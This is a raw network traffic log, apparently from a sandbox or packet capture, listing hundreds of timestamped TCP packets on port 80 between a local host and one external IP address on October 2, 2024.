Oct 2, 2024 18:19:20.686194897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686204910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686223984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686232090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686258078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686266899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686295033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686302900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686321974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686330080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686348915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686357975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686378002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686387062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686412096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686434984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686448097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686469078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686486006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686496973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686511040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686532021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686544895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686552048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686570883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686588049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686614990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686666965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686682940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686703920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686722994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686765909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686784029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686804056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686819077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686877012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686891079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686913967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686925888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.686933041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.686968088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687015057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687042952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687052011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687072992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687082052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687100887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687109947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687129021 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687138081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687158108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687166929 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687192917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687422037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687436104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687459946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687467098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687473059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687494040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687500954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687520027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687527895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687546015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687556028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687573910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687582016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687601089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687609911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687629938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687637091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687663078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687886000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687903881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687917948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687935114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687943935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687963009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687973022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.687990904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.687999010 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688018084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688026905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688045979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688055038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688074112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688082933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688102007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688110113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688128948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688137054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688157082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688165903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688184023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688193083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688211918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688220024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688239098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688247919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688266993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688276052 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688294888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688302040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688333035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688496113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688510895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688536882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688553095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688565969 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688585043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688595057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.688606977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.688636065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.725502968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.725562096 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.725584984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.725593090 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.725624084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.725630999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.725646019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.725661039 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.725678921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.725701094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.725720882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.725728989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.725743055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.725756884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726424932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726475954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726500034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726514101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726547003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726560116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726598024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726627111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726636887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726655960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726664066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726684093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726692915 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726717949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726824045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726839066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726861954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726874113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726882935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726917982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726933002 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726947069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726970911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.726980925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.726989985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727010012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727019072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727039099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727047920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727075100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727138996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727153063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727179050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727185965 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727196932 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727216005 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727221966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727241993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727252007 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727268934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.727279902 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.727308035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.749485016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.749532938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.749671936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.749687910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.749711037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.749723911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.749732971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.749751091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.749767065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.749778986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.749787092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.749806881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.749814987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.749845982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778011084 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778039932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778060913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778073072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778094053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778100967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778107882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778131962 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778143883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778172970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778183937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778202057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778209925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778228045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778237104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778261900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778273106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778290987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778311968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778325081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778331041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778350115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778362036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778378963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778388023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778414011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778424025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778441906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778466940 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778480053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778486967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778505087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778523922 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778539896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778547049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778568983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778578043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778597116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778606892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778625965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778634071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778652906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778661966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778681040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778696060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778717041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778726101 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778744936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778754950 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778774977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778784990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778805017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778812885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778841019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778863907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778891087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778903008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778919935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778928995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778948069 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778956890 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.778976917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.778985977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779005051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779012918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779032946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779042006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779063940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779073000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779099941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779356003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779402018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779424906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779439926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779463053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779480934 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779504061 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779521942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779545069 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779556036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779567003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779584885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779592991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779620886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779648066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779675961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779685974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779705048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779714108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779732943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779742002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779761076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779769897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779789925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779798985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779819965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779828072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779849052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779859066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779886961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779942036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779956102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779977083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.779989958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.779999018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780018091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780025959 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780046940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780055046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780073881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780082941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780102015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780109882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780127048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780134916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780162096 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780280113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780293941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780317068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780330896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780337095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780355930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780364990 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780384064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780392885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780411959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780420065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780438900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780447006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780467033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780474901 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780494928 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780503035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780522108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780529976 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780550957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780560017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780579090 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780586958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780620098 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780627966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780642033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780663967 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780675888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780684948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780702114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780719995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780729055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780742884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.780755043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.780770063 CEST	49737	80	192.168.2.4	185.215.113.37
